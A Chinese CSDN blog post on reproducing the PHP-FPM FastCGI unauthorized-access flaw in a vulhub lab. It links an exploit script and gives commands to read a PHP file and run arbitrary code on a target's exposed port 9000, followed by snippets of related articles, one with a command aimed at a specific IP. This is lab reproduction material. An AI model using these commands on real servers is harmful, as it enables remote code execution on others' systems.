PHP-FPM Fastcgi 未授权访问漏洞

最新推荐文章于 2024-08-18 04:37:35 发布
最新推荐文章于 2024-08-18 04:37:35 发布
阅读量208 收藏
点赞数
分类专栏: vulhub漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117619235
版权

PHP 安全漏洞 命令注入 PEAR.php 代码执行
关键词由CSDN通过智能技术生成

漏洞复现

exp:https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
exp需要访问原本就存在的PHP文件,才能够执行任意命令
查看PHP文件内容:

python fpm.py your-ip /usr/local/lib/php/PEAR.php

执行任意命令:

python fpm.py your-ip /usr/local/lib/php/PEAR.php -c '<?php echo `pwd`; ?>'
小 白 萝 卜
关注
专栏目录
PHP-FPM Fastcgi 授权访问漏洞(端口9000)
墨痕诉清风的博客
10-19 4385
因为fpm是根据这个值来执行php文件的,如果这个文件不存在,fpm会直接返回404。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。这两个环境变量就是用来设置PHP配置项的,PHP_VALUE可以设置模式为PHP_INI_USER和PHP_INI_ALL的选项,PHP_ADMIN_VALUE可以设置所有选项。..
利用Vulnhub复现漏洞 - PHP-FPM Fastcgi 授权访问漏洞
JiangBuLiu的博客
07-08 2368
PHP-FPM Fastcgi 授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现EXP测试EXP由于访问非*.PHP文件,所以返回结果403使用命令执行一个默认存在的php文件任意命令执行复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/fpm/ 漏洞原理 https://www.leavesongs.com/PENETR...
PHP-FPM Fastcgi 授权访问漏洞复现
玄道的网安博客
03-05 981
简介 PHP-FPM是一个fastcgi协议解析器,Nginx等服务器中间件将用户请求按照fastcgi的规则打包好传给FPM。FPM按照fastcgi的协议将TCP流解析成真正的数据。PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。 环境搭建 这里使用docker进行搭建 https://github.com/vulhub/vulhub 进入目录并启动 cd vulhub-master/php/fpm/ ...
php-fpm授权访问漏洞
banliyaoguai的博客
08-16 1148
想要了解php-fpm就先要知道FastcgiFastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成,record也有header和body一说,服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。
fastcgi授权访问漏洞(php-fpm fast-cgi授权访问漏洞)
好好睡觉
02-10 3919
fastcgi授权访问漏洞
php-FPM 基于fastcgi协议的rce漏洞复现 CVE-2019-11043
Shanfenglan's blog
11-16 5493
文章目录参考文章 参考文章 PHP-FPM Fastcgi 授权访问漏洞 PHP-FPM Fastcgi 授权访问漏洞
PHP-FPM Fastcgi 授权访问漏洞: PHP会把前端的请求参数,自动输出到返回前面
pillar04的专栏
08-18 500
我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。然后,执行SCRIPT_FILENAME的值指向的PHP文件,也就是/var/www/html/index.php。是告诉PHP,在执行目标文件之前,先包含。
在PHP中使用FastCGI解析漏洞及修复方案
10-23
特别是在PHP与FastCGI结合使用时,如果配置不当,可能会出现解析漏洞,导致Web服务器的静态文件如CSS、JS、图片等被错误地作为PHP文件执行。这种漏洞可能会被攻击者利用,以上传恶意脚本并获取服务器的控制权。 ...
Fastcgi php-fpm 漏洞利用方式
weixin_34112900的博客
03-31 514
fastcgi php-fpm 端口对外开放 外部提交的命令可以执行https://github.com/adoy/PHP-FastCGI-Clientlocal/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hosts 转载于:https://blog.51cto.com/0x007/1626946...
fastcgi授权访问及任意命令执行
浅笑996的博客
11-21 2301
1. 漏洞原理 服务端使用fastcgi协议并对外网开放9000端口,攻击者可以构造fastcgi协议包内容,实现授权访问服务端.php文件以及执行任意命令。 2. 漏洞利用 第一步 搭建vulhub靶机环境 请看链接:https://blog.csdn.net/qq_36374896/article/details/84102101 第二步 Payload构造 攻击机构造Payload 示例:...
Fastcgi协议与PHP-FPM 攻击方法
05-25 958
1、CGI(Common Gateway Interface) 通用网关接口 最早的服务器只能够返回静态资源给浏览器。但这种方式满足不了人们的所有需求,于是出现了动态网站技术,但是Web服务器不能够直接解释执行动态脚本,于是人们为了能够让Web服务器与外部应用程序(CGI程序)互相通信。CGI通用网关接口应运而生。简单地说CGI就像是一种协议,这种协议规定了Web服务器和运行在Web服务器上的应用程序进行交流的方式。 当Web服务器需要解析动态脚本时,Web服务器会Fork一个新的进程来启动CGI成语完
利用Fastcgi+PHP-FPM授权访问实现代码执行
qq_68163788的博客
01-05 1257
FastCGI (Fast Common Gateway Interface) 是一种用于扩展服务器功能的协议。它允许 Web 服务器将动态内容的处理委托给外部程序,而不是由 Web 服务器自身来处理。PHP-FPM (PHP FastCGI Process Manager) 是 PHP 的一个 FastCGI 进程管理器,它可以处理 PHP 脚本的执行。 FastCGIPHP-FPM 的结合可以提供更高效的 PHP 脚本处理方式,通过将 PHP 解释器作为独立的进程运行,而不是作为 Web 服务器
PHP-FPM授权访问漏洞
最新发布
m0_68976043的博客
08-18 491
docker直接搭建。
Fastcgi协议分析 && PHP-FPM授权访问漏洞 && Exp编写
mysteryflower的专栏
08-29 6705
搭过php相关环境的同学应该对fastcgi不陌生,那么fastcgi究竟是什么东西,为什么nginx可以通过fastcgi来对接php? Fastcgi Record Fastcgi其实是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。 HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件...
mod_php、mod_fastcgiphp-fpm:对比与性能分析
"这篇文章主要介绍了mod_php、mod_fastcgi以及php-fpm的原理、区别以及性能数据。通过对比这三种处理PHP脚本的方式,帮助读者理解它们各自的特点和适用场景。" 在LAMP(Linux、Apache、MySQL、PHP)架构中,PHP的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值